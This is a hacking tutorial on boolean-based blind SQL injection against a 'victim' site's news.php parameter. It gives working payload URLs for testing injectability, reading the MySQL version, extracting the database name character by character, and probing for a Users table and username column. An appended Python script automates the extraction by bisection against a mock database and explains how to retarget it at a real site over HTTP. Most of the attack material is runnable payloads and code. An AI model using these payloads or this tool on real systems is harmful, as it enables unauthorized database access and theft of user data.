Boolean-based blind SQL injection is the hardest technique to apply by hand, because every question you ask the database can only be answered with true or false, so the data has to be recovered one small piece at a time. Use it only when the error-based technique doesn't work. First you need to confirm that a parameter on the victim's website is injectable. To do this, add "+AND+1=1" to the end of the URL:
www.victim.com/news.php?id=6+AND+1=1
The page should render exactly as it did before. Now append "+AND+1=2" instead:
www.victim.com/news.php?id=6+AND+1=2
If the page now changes (the record disappears or you get an error), you are on the right track: the application is evaluating your condition inside its query, so the parameter is injectable. Compare the 1=1 and 1=2 responses against each other, not only against the original page, and make sure the difference is repeatable; a page that changes for unrelated reasons (caching, rotating content) will give false answers to every question that follows. Throughout this article "error" simply means "the page changed", and "no error" means "the page is unchanged".
Now it's time to find out the version of the database. For this we use the "substring" function on MySQL's @@version variable. For example:
www.victim.com/news.php?id=6+and+substring(@@version,1,1)=4
If the page changes, the database is not version 4 (e.g. 4.2.2). Next check whether it is version 5 (e.g. 5.0.51b-log):
www.victim.com/news.php?id=6+and+substring(@@version,1,1)=5
You'll probably get the normal page without errors, which means the database version is 5. Now test whether a subselect works:
www.victim.com/news.php?id=6+and+(select+1)=1
If the page is unchanged, subselects work. The next step is to find the name of the current database. First find how many characters the name contains, using the "length" function. For example:
1 question: Is it lower than 10?
www.victim.com/news.php?id=6+and+length(database())<10
1 answer: No error = YES
2 question: Is it lower than 6?
www.victim.com/news.php?id=6+and+length(database())<6
2 answer: Error = NO
3 question: Is it equal to 6?
www.victim.com/news.php?id=6+and+length(database())=6
3 answer: No error = YES
Now we know that the name of the database is 6 characters long. It's time to find the characters themselves. The principle is the same as for the length: ask about the ASCII code of one character at a time, using ascii(substring(database(),position,1)).
1 question: Is it lower than 97?
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))<97
1 answer: Error = NO
2 question: Is it lower than 122?
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))<122
2 answer: No error = YES
This means that the ASCII code of the first character of the database name is at least 97 and below 122, i.e. between 97 and 121, which is a lowercase letter. See a full ASCII table for all symbols, letters and digits.
3 question: Is it equal to 118?
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))=118
3 answer: No error = YES
We have found the first of the six characters: 118. If you look at http://ascii-ascii.blogspot.com you'll see that 118 is the lowercase letter "v". Now we need to find the second letter.
1 question: Is it lower than 108?
www.victim.com/news.php?id=6+and+ascii(substring(database(),2,1))<108
1 answer: No error = YES
2 question: Is it equal to 105?
www.victim.com/news.php?id=6+and+ascii(substring(database(),2,1))=105
2 answer: No error = YES
We have found the second of the six characters: 105. If you look at http://ascii-ascii.blogspot.com you'll see that 105 is the lowercase letter "i".
We do the same thing for the third character.
1 question: Is it lower than 102?
www.victim.com/news.php?id=6+and+ascii(substring(database(),3,1))<102
1 answer: No error = YES
2 question: Is it equal to 99?
www.victim.com/news.php?id=6+and+ascii(substring(database(),3,1))=99
2 answer: No error = YES
And we have found the third of the six characters: 99. If you look at http://ascii-ascii.blogspot.com you'll see that 99 is the lowercase letter "c".
We have three letters, "vic...", and I assumed the database name is "victim". Guessing the rest saves requests, but either finish the remaining characters or confirm the guess with one more true/false question before relying on it. In the same way you can find tables, columns and even data. Queries for obtaining this information can be found at http://web-injection.blogspot.com/2010/10/error-based-sql-injections.html. You can also use a tool such as "BlindCat".
Sometimes you can find tables or columns by guessing. For example, assume there is a table "Users":
www.victim.com/news.php?id=6+and+(select+1+from+Users+limit+0,1)=1
Error = Not exist
No Error = Exist
For the column "username" in table "Users" the query would look like this. The concat(1,username) wrapper makes the expression non-NULL even when the first row's username is NULL, so its first character is always "1" if the column exists, and the query errors out if it doesn't:
www.victim.com/news.php?id=6+and+(select+substring(concat(1,username),1,1)+from+Users+limit+0,1)=1
Error = Not exist
No Error= Exist
Be creative ...
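The whole procedure above, automated, as an added example that is not part of the original article. Instead of hand-picked "<10, <6, =6" questions it binary-searches the length and each character's ASCII code, which is the general form of the bisection the article does by hand. Because it has to run offline, the vulnerable news.php is replaced by a constructed stand-in: an in-memory SQLite database with a `news` table and a `Users` table, plus emulations of the MySQL functions the payloads rely on (database(), ascii(), substring(), concat()); the database name "victim", the table contents and the 64-character length cap are all assumptions of this example.

```python
import sqlite3
from typing import Callable


# Constructed stand-in for the vulnerable news.php from the article: the id
# parameter is concatenated straight into the SQL string, which is the bug the
# whole technique depends on. SQLite is used so the example runs offline; the
# MySQL functions the payloads rely on are emulated with create_function.
def build_mock_app(db_name: str = "victim") -> Callable[[str], bool]:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT);
        INSERT INTO news VALUES (6, 'Sample news item');
        CREATE TABLE Users (id INTEGER, username TEXT);
        INSERT INTO Users VALUES (1, 'admin');
    """)
    conn.create_function("database", 0, lambda: db_name)
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("substring", 3, lambda s, pos, n: s[pos - 1:pos - 1 + n])
    conn.create_function("concat", -1, lambda *parts: "".join(str(p) for p in parts))

    def page_unchanged(id_param: str) -> bool:
        """All the attacker can observe: True when the normal page renders
        (the row came back), False when it changes (no row, or a SQL error)."""
        try:
            rows = conn.execute("SELECT title FROM news WHERE id=" + id_param).fetchall()
        except sqlite3.Error:
            return False
        return len(rows) > 0

    return page_unchanged


class Oracle:
    """Wraps the boolean observation and counts how many requests a run costs."""

    def __init__(self, page_unchanged: Callable[[str], bool]) -> None:
        self.page_unchanged = page_unchanged
        self.requests = 0

    def ask(self, condition: str) -> bool:
        # Every question is sent as "6 and <condition>", exactly as in the article.
        self.requests += 1
        return self.page_unchanged("6 and " + condition)


def is_injectable(o: Oracle) -> bool:
    # Both halves of the first test must agree: a page that changes on 1=2
    # but not on 1=1 is reacting to our condition.
    return o.ask("1=1") and not o.ask("1=2")


def find_length(o: Oracle, expr: str, max_len: int = 64) -> int:
    # Binary search for the smallest n with length(expr) <= n.
    # Assumes 1 <= length <= max_len (an assumption of this example).
    lo, hi = 1, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if o.ask(f"length({expr})<={mid}"):
            hi = mid
        else:
            lo = mid + 1
    return lo


def find_char(o: Oracle, expr: str, pos: int) -> str:
    # Same bisection over ascii(substring(expr,pos,1)), restricted to
    # printable ASCII (32..126): about 7 requests per character.
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if o.ask(f"ascii(substring({expr},{pos},1))<={mid}"):
            hi = mid
        else:
            lo = mid + 1
    return chr(lo)


def extract(o: Oracle, expr: str) -> str:
    """Recover the full string value of a SQL expression, e.g. database()."""
    n = find_length(o, expr)
    return "".join(find_char(o, expr, i) for i in range(1, n + 1))


def table_exists(o: Oracle, table: str) -> bool:
    # The article's guess: an unknown table makes the subselect error out.
    return o.ask(f"(select 1 from {table} limit 0,1)=1")


def column_exists(o: Oracle, table: str, column: str) -> bool:
    # concat(1,column) guards against a NULL value; the compared literal is
    # quoted so the same payload also satisfies SQLite's strict type rules
    # (MySQL would accept the article's bare =1 as well).
    return o.ask(f"(select substring(concat(1,{column}),1,1) from {table} limit 0,1)='1'")


if __name__ == "__main__":
    oracle = Oracle(build_mock_app())
    print("injectable:", is_injectable(oracle))
    print("database():", extract(oracle, "database()"))
    print("table Users exists:", table_exists(oracle, "Users"))
    print("column Users.username exists:", column_exists(oracle, "Users", "username"))
    print("first username:", extract(oracle, "(select username from Users limit 0,1)"))
    print("requests used:", oracle.requests)
```

To point this at a real target you would replace `build_mock_app()` with a function that sends `news.php?id=<payload>` over HTTP and compares the response body against the known-good 1=1 page; everything else stays the same. The request counter is worth watching: six characters of database name cost roughly 50 requests here, and each table or column guess costs one more, which is why blind extraction is slow and noisy in a web server's logs.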